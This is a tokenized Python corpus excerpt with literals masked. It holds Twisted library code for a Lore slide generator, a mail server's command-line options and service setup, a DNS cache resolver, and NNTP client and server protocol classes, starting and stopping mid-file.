getOutputFileName ) : <EOL> from tree import parseFileAndReport <EOL> doc = parseFileAndReport ( filename ) <EOL> slides = munge ( doc , templ , linkrel , os . path . dirname ( filename ) , filename , ext , url , options ) <EOL> for slide , index in zip ( slides , range ( len ( slides ) ) ) : <EOL> newFilename = outfileGenerator ( filename , ext , index ) <EOL> makeSureDirectoryExists ( newFilename ) <EOL> f = open ( newFilename , '<STR_LIT:wb>' ) <EOL> slide . dom . writexml ( f ) <EOL> f . close ( ) <EOL> class ProsperSlides ( LatexSpitter ) : <EOL> firstSlide = <NUM_LIT:1> <EOL> start_html = '<STR_LIT>' <EOL> start_body = '<STR_LIT>' <EOL> start_div_author = '<STR_LIT>' <EOL> end_div_author = '<STR_LIT:}>' <EOL> def visitNode_h2 ( self , node ) : <EOL> if self . firstSlide : <EOL> self . firstSlide = <NUM_LIT:0> <EOL> self . end_body = '<STR_LIT>' + self . end_body <EOL> else : <EOL> self . writer ( '<STR_LIT>' ) <EOL> self . writer ( '<STR_LIT>' ) <EOL> spitter = HeadingLatexSpitter ( self . writer , self . currDir , self . filename ) <EOL> spitter . visitNodeDefault ( node ) <EOL> self . writer ( '<STR_LIT:}>' ) <EOL> def _write_img ( self , target ) : <EOL> self . writer ( '<STR_LIT>' <EOL> '<STR_LIT>' % target ) <EOL> class PagebreakLatex ( LatexSpitter ) : <EOL> everyN = <NUM_LIT:1> <EOL> currentN = <NUM_LIT:0> <EOL> seenH2 = <NUM_LIT:0> <EOL> start_html = LatexSpitter . start_html + "<STR_LIT>" <EOL> start_body = '<STR_LIT>' <EOL> def visitNode_h2 ( self , node ) : <EOL> if not self . seenH2 : <EOL> self . currentN = <NUM_LIT:0> <EOL> self . seenH2 = <NUM_LIT:1> <EOL> else : <EOL> self . currentN += <NUM_LIT:1> <EOL> self . currentN %= self . everyN <EOL> if not self . currentN : <EOL> self . writer ( '<STR_LIT>' ) <EOL> level = ( int ( node . tagName [ <NUM_LIT:1> ] ) - <NUM_LIT:2> ) + self . baseLevel <EOL> self . writer ( '<STR_LIT>' + level * '<STR_LIT>' + '<STR_LIT>' ) <EOL> spitter = HeadingLatexSpitter ( self . writer , self . currDir , self . filename ) <EOL> spitter . visitNodeDefault ( node ) <EOL> self . writer ( '<STR_LIT>' ) <EOL> class TwoPagebreakLatex ( PagebreakLatex ) : <EOL> everyN = <NUM_LIT:2> <EOL> class SlidesProcessingFunctionFactory ( default . ProcessingFunctionFactory ) : <EOL> latexSpitters = default . ProcessingFunctionFactory . latexSpitters . copy ( ) <EOL> latexSpitters [ '<STR_LIT>' ] = ProsperSlides <EOL> latexSpitters [ '<STR_LIT>' ] = PagebreakLatex <EOL> latexSpitters [ '<STR_LIT>' ] = TwoPagebreakLatex <EOL> def getDoFile ( self ) : <EOL> return doFile <EOL> def generate_mgp ( self , d , fileNameGenerator = None ) : <EOL> template = d . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> df = lambda file , linkrel : convertFile ( file , MagicpointOutput , template , ext = "<STR_LIT>" ) <EOL> return df <EOL> factory = SlidesProcessingFunctionFactory ( ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import warnings <EOL> from twisted . mail import mail <EOL> from twisted . mail import maildir <EOL> from twisted . mail import relay <EOL> from twisted . mail import relaymanager <EOL> from twisted . mail import alias <EOL> from twisted . internet import endpoints <EOL> from twisted . python import usage <EOL> from twisted . cred import checkers <EOL> from twisted . cred import strcred <EOL> from twisted . application import internet <EOL> class Options ( usage . Options , strcred . AuthOptionMixin ) : <EOL> synopsis = "<STR_LIT>" <EOL> optParameters = [ <EOL> [ "<STR_LIT>" , "<STR_LIT:S>" , <NUM_LIT:0> , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" , "<STR_LIT:c>" , None , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" , "<STR_LIT:R>" , None , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" , "<STR_LIT:H>" , None , <EOL> "<STR_LIT>" ] , <EOL> ] <EOL> optFlags = [ <EOL> [ "<STR_LIT>" , "<STR_LIT:E>" , "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" , None , <EOL> "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" , None , "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" , None , "<STR_LIT>" ] , <EOL> ] <EOL> _protoDefaults = { <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> } <EOL> compData = usage . Completions ( <EOL> optActions = { "<STR_LIT>" : usage . CompleteHostnames ( ) , <EOL> "<STR_LIT>" : usage . CompleteFiles ( "<STR_LIT>" ) } <EOL> ) <EOL> longdesc = "<STR_LIT>" <EOL> def __init__ ( self ) : <EOL> usage . Options . __init__ ( self ) <EOL> self . service = mail . MailService ( ) <EOL> self . last_domain = None <EOL> for service in self . _protoDefaults : <EOL> self [ service ] = [ ] <EOL> def addEndpoint ( self , service , description , certificate = None ) : <EOL> """<STR_LIT>""" <EOL> self [ service ] . append ( <EOL> _toEndpoint ( description , certificate = certificate ) ) <EOL> def opt_pop3 ( self , description ) : <EOL> """<STR_LIT>""" <EOL> self . addEndpoint ( '<STR_LIT>' , description ) <EOL> opt_p = opt_pop3 <EOL> def opt_smtp ( self , description ) : <EOL> """<STR_LIT>""" <EOL> self . addEndpoint ( '<STR_LIT>' , description ) <EOL> opt_s = opt_smtp <EOL> def opt_default ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . last_domain : <EOL> self . service . addDomain ( '<STR_LIT>' , self . last_domain ) <EOL> else : <EOL> raise usage . UsageError ( "<STR_LIT>" ) <EOL> opt_D = opt_default <EOL> def opt_maildirdbmdomain ( self , domain ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> name , path = domain . split ( '<STR_LIT:=>' ) <EOL> except ValueError : <EOL> raise usage . UsageError ( "<STR_LIT>" ) <EOL> self . last_domain = maildir . MaildirDirdbmDomain ( self . service , os . path . abspath ( path ) ) <EOL> self . service . addDomain ( name , self . last_domain ) <EOL> opt_d = opt_maildirdbmdomain <EOL> def opt_user ( self , user_pass ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> user , password = user_pass . split ( '<STR_LIT:=>' , <NUM_LIT:1> ) <EOL> except ValueError : <EOL> raise usage . UsageError ( "<STR_LIT>" ) <EOL> if self . last_domain : <EOL> self . last_domain . addUser ( user , password ) <EOL> else : <EOL> raise usage . UsageError ( "<STR_LIT>" ) <EOL> opt_u = opt_user <EOL> def opt_bounce_to_postmaster ( self ) : <EOL> """<STR_LIT>""" <EOL> self . last_domain . postmaster = <NUM_LIT:1> <EOL> opt_b = opt_bounce_to_postmaster <EOL> def opt_aliases ( self , filename ) : <EOL> """<STR_LIT>""" <EOL> if self . last_domain is not None : <EOL> if mail . IAliasableDomain . providedBy ( self . last_domain ) : <EOL> aliases = alias . loadAliasFile ( self . service . domains , filename ) <EOL> self . last_domain . setAliasGroup ( aliases ) <EOL> self . service . monitor . monitorFile ( <EOL> filename , <EOL> AliasUpdater ( self . service . domains , self . last_domain ) <EOL> ) <EOL> else : <EOL> raise usage . UsageError ( <EOL> "<STR_LIT>" % ( <EOL> self . last_domain . __class__ . __name__ , <EOL> ) <EOL> ) <EOL> else : <EOL> raise usage . UsageError ( "<STR_LIT>" ) <EOL> opt_A = opt_aliases <EOL> def _getEndpoints ( self , reactor , service ) : <EOL> """<STR_LIT>""" <EOL> if service == '<STR_LIT>' and self [ '<STR_LIT>' ] and len ( self [ service ] ) == <NUM_LIT:1> : <EOL> return self [ service ] + [ <EOL> endpoints . TCP4ServerEndpoint ( <EOL> reactor , self . _protoDefaults [ service ] ) ] <EOL> elif self [ service ] : <EOL> return self [ service ] <EOL> elif self [ '<STR_LIT>' + service ] : <EOL> return [ ] <EOL> else : <EOL> return [ <EOL> endpoints . TCP4ServerEndpoint ( <EOL> reactor , self . _protoDefaults [ service ] ) ] <EOL> def postOptions ( self ) : <EOL> from twisted . internet import reactor <EOL> if self [ '<STR_LIT>' ] : <EOL> if not self [ '<STR_LIT>' ] : <EOL> raise usage . UsageError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> elif not os . path . exists ( self [ '<STR_LIT>' ] ) : <EOL> raise usage . UsageError ( "<STR_LIT>" <EOL> % self [ '<STR_LIT>' ] ) <EOL> else : <EOL> self . addEndpoint ( <EOL> '<STR_LIT>' , self [ '<STR_LIT>' ] , certificate = self [ '<STR_LIT>' ] ) <EOL> if self [ '<STR_LIT>' ] and self [ '<STR_LIT>' ] is None : <EOL> raise usage . UsageError ( "<STR_LIT>" ) <EOL> if '<STR_LIT>' in self : <EOL> for ch in self [ '<STR_LIT>' ] : <EOL> self . service . smtpPortal . registerChecker ( ch ) <EOL> if not self [ '<STR_LIT>' ] : <EOL> self . service . smtpPortal . registerChecker ( checkers . AllowAnonymousAccess ( ) ) <EOL> anything = False <EOL> for service in self . _protoDefaults : <EOL> self [ service ] = self . _getEndpoints ( reactor , service ) <EOL> if self [ service ] : <EOL> anything = True <EOL> if not anything : <EOL> raise usage . UsageError ( "<STR_LIT>" ) <EOL> class AliasUpdater : <EOL> def __init__ ( self , domains , domain ) : <EOL> self . domains = domains <EOL> self . domain = domain <EOL> def __call__ ( self , new ) : <EOL> self . domain . setAliasGroup ( alias . loadAliasFile ( self . domains , new ) ) <EOL> def _toEndpoint ( description , certificate = None ) : <EOL> """<STR_LIT>""" <EOL> from twisted . internet import reactor <EOL> try : <EOL> port = int ( description ) <EOL> except ValueError : <EOL> return endpoints . serverFromString ( reactor , description ) <EOL> warnings . warn ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> category = DeprecationWarning , stacklevel = <NUM_LIT:3> ) <EOL> if certificate : <EOL> from twisted . internet . ssl import DefaultOpenSSLContextFactory <EOL> ctx = DefaultOpenSSLContextFactory ( certificate , certificate ) <EOL> return endpoints . SSL4ServerEndpoint ( reactor , port , ctx ) <EOL> return endpoints . TCP4ServerEndpoint ( reactor , port ) <EOL> def makeService ( config ) : <EOL> """<STR_LIT>""" <EOL> if config [ '<STR_LIT>' ] : <EOL> rmType = relaymanager . SmartHostESMTPRelayingManager <EOL> smtpFactory = config . service . getESMTPFactory <EOL> else : <EOL> rmType = relaymanager . SmartHostSMTPRelayingManager <EOL> smtpFactory = config . service . getSMTPFactory <EOL> if config [ '<STR_LIT>' ] : <EOL> dir = config [ '<STR_LIT>' ] <EOL> if not os . path . isdir ( dir ) : <EOL> os . mkdir ( dir ) <EOL> config . service . setQueue ( relaymanager . Queue ( dir ) ) <EOL> default = relay . DomainQueuer ( config . service ) <EOL> manager = rmType ( config . service . queue ) <EOL> if config [ '<STR_LIT>' ] : <EOL> manager . fArgs += ( None , None ) <EOL> manager . fArgs += ( config [ '<STR_LIT>' ] , ) <EOL> helper = relaymanager . RelayStateHelper ( manager , <NUM_LIT:1> ) <EOL> helper . setServiceParent ( config . service ) <EOL> config . service . domains . setDefaultDomain ( default ) <EOL> if config [ '<STR_LIT>' ] : <EOL> f = config . service . getPOP3Factory ( ) <EOL> for endpoint in config [ '<STR_LIT>' ] : <EOL> svc = internet . StreamServerEndpointService ( endpoint , f ) <EOL> svc . setServiceParent ( config . service ) <EOL> if config [ '<STR_LIT>' ] : <EOL> f = smtpFactory ( ) <EOL> if config [ '<STR_LIT>' ] : <EOL> f . domain = config [ '<STR_LIT>' ] <EOL> f . fArgs = ( f . domain , ) <EOL> if config [ '<STR_LIT>' ] : <EOL> f . fArgs = ( None , None ) + f . fArgs <EOL> for endpoint in config [ '<STR_LIT>' ] : <EOL> svc = internet . StreamServerEndpointService ( endpoint , f ) <EOL> svc . setServiceParent ( config . service ) <EOL> return config . service </s>
<s> from zope . interface import implements <EOL> from twisted . names import dns , common <EOL> from twisted . python import failure , log <EOL> from twisted . internet import interfaces , defer <EOL> class CacheResolver ( common . ResolverBase ) : <EOL> """<STR_LIT>""" <EOL> implements ( interfaces . IResolver ) <EOL> cache = None <EOL> def __init__ ( self , cache = None , verbose = <NUM_LIT:0> , reactor = None ) : <EOL> common . ResolverBase . __init__ ( self ) <EOL> self . cache = { } <EOL> self . verbose = verbose <EOL> self . cancel = { } <EOL> if reactor is None : <EOL> from twisted . internet import reactor <EOL> self . _reactor = reactor <EOL> if cache : <EOL> for query , ( seconds , payload ) in cache . items ( ) : <EOL> self . cacheResult ( query , payload , seconds ) <EOL> def __setstate__ ( self , state ) : <EOL> self . __dict__ = state <EOL> now = self . _reactor . seconds ( ) <EOL> for ( k , ( when , ( ans , add , ns ) ) ) in self . cache . items ( ) : <EOL> diff = now - when <EOL> for rec in ans + add + ns : <EOL> if rec . ttl < diff : <EOL> del self . cache [ k ] <EOL> break <EOL> def __getstate__ ( self ) : <EOL> for c in self . cancel . values ( ) : <EOL> c . cancel ( ) <EOL> self . cancel . clear ( ) <EOL> return self . __dict__ <EOL> def _lookup ( self , name , cls , type , timeout ) : <EOL> now = self . _reactor . seconds ( ) <EOL> q = dns . Query ( name , type , cls ) <EOL> try : <EOL> when , ( ans , auth , add ) = self . cache [ q ] <EOL> except KeyError : <EOL> if self . verbose > <NUM_LIT:1> : <EOL> log . msg ( '<STR_LIT>' + repr ( name ) ) <EOL> return defer . fail ( failure . Failure ( dns . DomainError ( name ) ) ) <EOL> else : <EOL> if self . verbose : <EOL> log . msg ( '<STR_LIT>' + repr ( name ) ) <EOL> diff = now - when <EOL> try : <EOL> result = ( <EOL> [ dns . RRHeader ( str ( r . name ) , r . type , r . cls , r . ttl - diff , <EOL> r . payload ) for r in ans ] , <EOL> [ dns . RRHeader ( str ( r . name ) , r . type , r . cls , r . ttl - diff , <EOL> r . payload ) for r in auth ] , <EOL> [ dns . RRHeader ( str ( r . name ) , r . type , r . cls , r . ttl - diff , <EOL> r . payload ) for r in add ] ) <EOL> except ValueError : <EOL> return defer . fail ( failure . Failure ( dns . DomainError ( name ) ) ) <EOL> else : <EOL> return defer . succeed ( result ) <EOL> def lookupAllRecords ( self , name , timeout = None ) : <EOL> return defer . fail ( failure . Failure ( dns . DomainError ( name ) ) ) <EOL> def cacheResult ( self , query , payload , cacheTime = None ) : <EOL> """<STR_LIT>""" <EOL> if self . verbose > <NUM_LIT:1> : <EOL> log . msg ( '<STR_LIT>' % query ) <EOL> self . cache [ query ] = ( cacheTime or self . _reactor . seconds ( ) , payload ) <EOL> if query in self . cancel : <EOL> self . cancel [ query ] . cancel ( ) <EOL> s = list ( payload [ <NUM_LIT:0> ] ) + list ( payload [ <NUM_LIT:1> ] ) + list ( payload [ <NUM_LIT:2> ] ) <EOL> if s : <EOL> m = s [ <NUM_LIT:0> ] . ttl <EOL> for r in s : <EOL> m = min ( m , r . ttl ) <EOL> else : <EOL> m = <NUM_LIT:0> <EOL> self . cancel [ query ] = self . _reactor . callLater ( m , self . clearEntry , query ) <EOL> def clearEntry ( self , query ) : <EOL> del self . cache [ query ] <EOL> del self . cancel [ query ] </s>
<s> """<STR_LIT>""" <EOL> import time <EOL> from twisted . protocols import basic <EOL> from twisted . python import log <EOL> def parseRange ( text ) : <EOL> articles = text . split ( '<STR_LIT:->' ) <EOL> if len ( articles ) == <NUM_LIT:1> : <EOL> try : <EOL> a = int ( articles [ <NUM_LIT:0> ] ) <EOL> return a , a <EOL> except ValueError : <EOL> return None , None <EOL> elif len ( articles ) == <NUM_LIT:2> : <EOL> try : <EOL> if len ( articles [ <NUM_LIT:0> ] ) : <EOL> l = int ( articles [ <NUM_LIT:0> ] ) <EOL> else : <EOL> l = None <EOL> if len ( articles [ <NUM_LIT:1> ] ) : <EOL> h = int ( articles [ <NUM_LIT:1> ] ) <EOL> else : <EOL> h = None <EOL> except ValueError : <EOL> return None , None <EOL> return l , h <EOL> def extractCode ( line ) : <EOL> line = line . split ( '<STR_LIT:U+0020>' , <NUM_LIT:1> ) <EOL> if len ( line ) != <NUM_LIT:2> : <EOL> return None <EOL> try : <EOL> return int ( line [ <NUM_LIT:0> ] ) , line [ <NUM_LIT:1> ] <EOL> except ValueError : <EOL> return None <EOL> class NNTPError ( Exception ) : <EOL> def __init__ ( self , string ) : <EOL> self . string = string <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % self . string <EOL> class NNTPClient ( basic . LineReceiver ) : <EOL> MAX_COMMAND_LENGTH = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> self . currentGroup = None <EOL> self . _state = [ ] <EOL> self . _error = [ ] <EOL> self . _inputBuffers = [ ] <EOL> self . _responseCodes = [ ] <EOL> self . _responseHandlers = [ ] <EOL> self . _postText = [ ] <EOL> self . _newState ( self . _statePassive , None , self . _headerInitial ) <EOL> def gotAllGroups ( self , groups ) : <EOL> "<STR_LIT>" <EOL> def getAllGroupsFailed ( self , error ) : <EOL> "<STR_LIT>" <EOL> def gotOverview ( self , overview ) : <EOL> "<STR_LIT>" <EOL> def getOverviewFailed ( self , error ) : <EOL> "<STR_LIT>" <EOL> def gotSubscriptions ( self , subscriptions ) : <EOL> "<STR_LIT>" <EOL> def getSubscriptionsFailed ( self , error ) : <EOL> "<STR_LIT>" <EOL> def gotGroup ( self , group ) : <EOL> "<STR_LIT>" <EOL> def getGroupFailed ( self , error ) : <EOL> "<STR_LIT>" <EOL> def gotArticle ( self , article ) : <EOL> "<STR_LIT>" <EOL> def getArticleFailed ( self , error ) : <EOL> "<STR_LIT>" <EOL> def gotHead ( self , head ) : <EOL> "<STR_LIT>" <EOL> def getHeadFailed ( self , error ) : <EOL> "<STR_LIT>" <EOL> def gotBody ( self , info ) : <EOL> "<STR_LIT>" <EOL> def getBodyFailed ( self , body ) : <EOL> "<STR_LIT>" <EOL> def postedOk ( self ) : <EOL> "<STR_LIT>" <EOL> def postFailed ( self , error ) : <EOL> "<STR_LIT>" <EOL> def gotXHeader ( self , headers ) : <EOL> "<STR_LIT>" <EOL> def getXHeaderFailed ( self , error ) : <EOL> "<STR_LIT>" <EOL> def gotNewNews ( self , news ) : <EOL> "<STR_LIT>" <EOL> def getNewNewsFailed ( self , error ) : <EOL> "<STR_LIT>" <EOL> def gotNewGroups ( self , groups ) : <EOL> "<STR_LIT>" <EOL> def getNewGroupsFailed ( self , error ) : <EOL> "<STR_LIT>" <EOL> def setStreamSuccess ( self ) : <EOL> "<STR_LIT>" <EOL> def setStreamFailed ( self , error ) : <EOL> "<STR_LIT>" <EOL> def fetchGroups ( self ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> self . _newState ( self . _stateList , self . getAllGroupsFailed ) <EOL> def fetchOverview ( self ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> self . _newState ( self . _stateOverview , self . getOverviewFailed ) <EOL> def fetchSubscriptions ( self ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> self . _newState ( self . _stateSubscriptions , self . getSubscriptionsFailed ) <EOL> def fetchGroup ( self , group ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( '<STR_LIT>' % ( group , ) ) <EOL> self . _newState ( None , self . getGroupFailed , self . _headerGroup ) <EOL> def fetchHead ( self , index = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( '<STR_LIT>' % ( index , ) ) <EOL> self . _newState ( self . _stateHead , self . getHeadFailed ) <EOL> def fetchBody ( self , index = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( '<STR_LIT>' % ( index , ) ) <EOL> self . _newState ( self . _stateBody , self . getBodyFailed ) <EOL> def fetchArticle ( self , index = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( '<STR_LIT>' % ( index , ) ) <EOL> self . _newState ( self . _stateArticle , self . getArticleFailed ) <EOL> def postArticle ( self , text ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( '<STR_LIT:POST>' ) <EOL> self . _newState ( None , self . postFailed , self . _headerPost ) <EOL> self . _postText . append ( text ) <EOL> def fetchNewNews ( self , groups , date , distributions = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> date , timeStr = time . strftime ( '<STR_LIT>' , time . gmtime ( date ) ) . split ( ) <EOL> line = '<STR_LIT>' % ( date , timeStr , distributions ) <EOL> groupPart = '<STR_LIT>' <EOL> while len ( groups ) and len ( line ) + len ( groupPart ) + len ( groups [ - <NUM_LIT:1> ] ) + <NUM_LIT:1> < NNTPClient . MAX_COMMAND_LENGTH : <EOL> group = groups . pop ( ) <EOL> groupPart = groupPart + '<STR_LIT:U+002C>' + group <EOL> self . sendLine ( line % ( groupPart , ) ) <EOL> self . _newState ( self . _stateNewNews , self . getNewNewsFailed ) <EOL> if len ( groups ) : <EOL> self . fetchNewNews ( groups , date , distributions ) <EOL> def fetchNewGroups ( self , date , distributions ) : <EOL> """<STR_LIT>""" <EOL> date , timeStr = time . strftime ( '<STR_LIT>' , time . gmtime ( date ) ) . split ( ) <EOL> self . sendLine ( '<STR_LIT>' % ( date , timeStr , distributions ) ) <EOL> self . _newState ( self . _stateNewGroups , self . getNewGroupsFailed ) <EOL> def fetchXHeader ( self , header , low = None , high = None , id = None ) : <EOL> """<STR_LIT>""" <EOL> if id is not None : <EOL> r = header + '<STR_LIT>' % ( id , ) <EOL> elif low is high is None : <EOL> r = header <EOL> elif high is None : <EOL> r = header + '<STR_LIT>' % ( low , ) <EOL> elif low is None : <EOL> r = header + '<STR_LIT>' % ( high , ) <EOL> else : <EOL> r = header + '<STR_LIT>' % ( low , high ) <EOL> self . sendLine ( '<STR_LIT>' + r ) <EOL> self . _newState ( self . _stateXHDR , self . getXHeaderFailed ) <EOL> def setStream ( self ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> self . _newState ( None , self . setStreamFailed , self . _headerMode ) <EOL> def quit ( self ) : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> self . transport . loseConnection ( ) <EOL> def _newState ( self , method , error , responseHandler = None ) : <EOL> self . _inputBuffers . append ( [ ] ) <EOL> self . _responseCodes . append ( None ) <EOL> self . _state . append ( method ) <EOL> self . _error . append ( error ) <EOL> self . _responseHandlers . append ( responseHandler ) <EOL> def _endState ( self ) : <EOL> buf = self . _inputBuffers [ <NUM_LIT:0> ] <EOL> del self . _responseCodes [ <NUM_LIT:0> ] <EOL> del self . _inputBuffers [ <NUM_LIT:0> ] <EOL> del self . _state [ <NUM_LIT:0> ] <EOL> del self . _error [ <NUM_LIT:0> ] <EOL> del self . _responseHandlers [ <NUM_LIT:0> ] <EOL> return buf <EOL> def _newLine ( self , line , check = <NUM_LIT:1> ) : <EOL> if check and line and line [ <NUM_LIT:0> ] == '<STR_LIT:.>' : <EOL> line = line [ <NUM_LIT:1> : ] <EOL> self . _inputBuffers [ <NUM_LIT:0> ] . append ( line ) <EOL> def _setResponseCode ( self , code ) : <EOL> self . _responseCodes [ <NUM_LIT:0> ] = code <EOL> def _getResponseCode ( self ) : <EOL> return self . _responseCodes [ <NUM_LIT:0> ] <EOL> def lineReceived ( self , line ) : <EOL> if not len ( self . _state ) : <EOL> self . _statePassive ( line ) <EOL> elif self . _getResponseCode ( ) is None : <EOL> code = extractCode ( line ) <EOL> if code is None or not ( <NUM_LIT:200> <= code [ <NUM_LIT:0> ] < <NUM_LIT> ) : <EOL> self . _error [ <NUM_LIT:0> ] ( line ) <EOL> self . _endState ( ) <EOL> else : <EOL> self . _setResponseCode ( code ) <EOL> if self . _responseHandlers [ <NUM_LIT:0> ] : <EOL> self . _responseHandlers [ <NUM_LIT:0> ] ( code ) <EOL> else : <EOL> self . _state [ <NUM_LIT:0> ] ( line ) <EOL> def _statePassive ( self , line ) : <EOL> log . msg ( '<STR_LIT>' % line ) <EOL> def _passiveError ( self , error ) : <EOL> log . err ( '<STR_LIT>' % ( error , ) ) <EOL> def _headerInitial ( self , ( code , message ) ) : <EOL> if code == <NUM_LIT:200> : <EOL> self . canPost = <NUM_LIT:1> <EOL> else : <EOL> self . canPost = <NUM_LIT:0> <EOL> self . _endState ( ) <EOL> def _stateList ( self , line ) : <EOL> if line != '<STR_LIT:.>' : <EOL> data = filter ( None , line . strip ( ) . split ( ) ) <EOL> self . _newLine ( ( data [ <NUM_LIT:0> ] , int ( data [ <NUM_LIT:1> ] ) , int ( data [ <NUM_LIT:2> ] ) , data [ <NUM_LIT:3> ] ) , <NUM_LIT:0> ) <EOL> else : <EOL> self . gotAllGroups ( self . _endState ( ) ) <EOL> def _stateOverview ( self , line ) : <EOL> if line != '<STR_LIT:.>' : <EOL> self . _newLine ( filter ( None , line . strip ( ) . split ( ) ) , <NUM_LIT:0> ) <EOL> else : <EOL> self . gotOverview ( self . _endState ( ) ) <EOL> def _stateSubscriptions ( self , line ) : <EOL> if line != '<STR_LIT:.>' : <EOL> self . _newLine ( line . strip ( ) , <NUM_LIT:0> ) <EOL> else : <EOL> self . gotSubscriptions ( self . _endState ( ) ) <EOL> def _headerGroup ( self , ( code , line ) ) : <EOL> self . gotGroup ( tuple ( line . split ( ) ) ) <EOL> self . _endState ( ) <EOL> def _stateArticle ( self , line ) : <EOL> if line != '<STR_LIT:.>' : <EOL> if line . startswith ( '<STR_LIT:.>' ) : <EOL> line = line [ <NUM_LIT:1> : ] <EOL> self . _newLine ( line , <NUM_LIT:0> ) <EOL> else : <EOL> self . gotArticle ( '<STR_LIT:\n>' . join ( self . _endState ( ) ) + '<STR_LIT:\n>' ) <EOL> def _stateHead ( self , line ) : <EOL> if line != '<STR_LIT:.>' : <EOL> self . _newLine ( line , <NUM_LIT:0> ) <EOL> else : <EOL> self . gotHead ( '<STR_LIT:\n>' . join ( self . _endState ( ) ) ) <EOL> def _stateBody ( self , line ) : <EOL> if line != '<STR_LIT:.>' : <EOL> if line . startswith ( '<STR_LIT:.>' ) : <EOL> line = line [ <NUM_LIT:1> : ] <EOL> self . _newLine ( line , <NUM_LIT:0> ) <EOL> else : <EOL> self . gotBody ( '<STR_LIT:\n>' . join ( self . _endState ( ) ) + '<STR_LIT:\n>' ) <EOL> def _headerPost ( self , ( code , message ) ) : <EOL> if code == <NUM_LIT> : <EOL> self . transport . write ( self . _postText [ <NUM_LIT:0> ] . replace ( '<STR_LIT:\n>' , '<STR_LIT:\r\n>' ) . replace ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> if self . _postText [ <NUM_LIT:0> ] [ - <NUM_LIT:1> : ] != '<STR_LIT:\n>' : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> self . sendLine ( '<STR_LIT:.>' ) <EOL> del self . _postText [ <NUM_LIT:0> ] <EOL> self . _newState ( None , self . postFailed , self . _headerPosted ) <EOL> else : <EOL> self . postFailed ( '<STR_LIT>' % ( code , message ) ) <EOL> self . _endState ( ) <EOL> def _headerPosted ( self , ( code , message ) ) : <EOL> if code == <NUM_LIT> : <EOL> self . postedOk ( ) <EOL> else : <EOL> self . postFailed ( '<STR_LIT>' % ( code , message ) ) <EOL> self . _endState ( ) <EOL> def _stateXHDR ( self , line ) : <EOL> if line != '<STR_LIT:.>' : <EOL> self . _newLine ( line . split ( ) , <NUM_LIT:0> ) <EOL> else : <EOL> self . _gotXHeader ( self . _endState ( ) ) <EOL> def _stateNewNews ( self , line ) : <EOL> if line != '<STR_LIT:.>' : <EOL> self . _newLine ( line , <NUM_LIT:0> ) <EOL> else : <EOL> self . gotNewNews ( self . _endState ( ) ) <EOL> def _stateNewGroups ( self , line ) : <EOL> if line != '<STR_LIT:.>' : <EOL> self . _newLine ( line , <NUM_LIT:0> ) <EOL> else : <EOL> self . gotNewGroups ( self . _endState ( ) ) <EOL> def _headerMode ( self , ( code , message ) ) : <EOL> if code == <NUM_LIT> : <EOL> self . setStreamSuccess ( ) <EOL> else : <EOL> self . setStreamFailed ( ( code , message ) ) <EOL> self . _endState ( ) <EOL> class NNTPServer ( basic . LineReceiver ) : <EOL> COMMANDS = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:POST>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> ] <EOL> def __init__ ( self ) : <EOL> self . servingSlave = <NUM_LIT:0> <EOL> def connectionMade ( self ) : <EOL> self . inputHandler = None <EOL> self . currentGroup = None <EOL> self . currentIndex = None <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> def lineReceived ( self , line ) : <EOL> if self . inputHandler is not None : <EOL> self . inputHandler ( line ) <EOL> else : <EOL> parts = line . strip ( ) . split ( ) <EOL> if len ( parts ) : <EOL> cmd , parts = parts [ <NUM_LIT:0> ] . upper ( ) , parts [ <NUM_LIT:1> : ] <EOL> if cmd in NNTPServer . COMMANDS : <EOL> func = getattr ( self , '<STR_LIT>' % cmd ) <EOL> try : <EOL> func ( * parts ) <EOL> except TypeError : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> log . msg ( "<STR_LIT>" ) <EOL> log . msg ( "<STR_LIT>" , line ) <EOL> log . deferr ( ) <EOL> except : <EOL> self . sendLine ( '<STR_LIT>' ) <EOL> log . msg ( "<STR_LIT>" ) <EOL> log . msg ( "<STR_LIT>" , line ) <EOL> log . deferr ( ) <EOL> else : 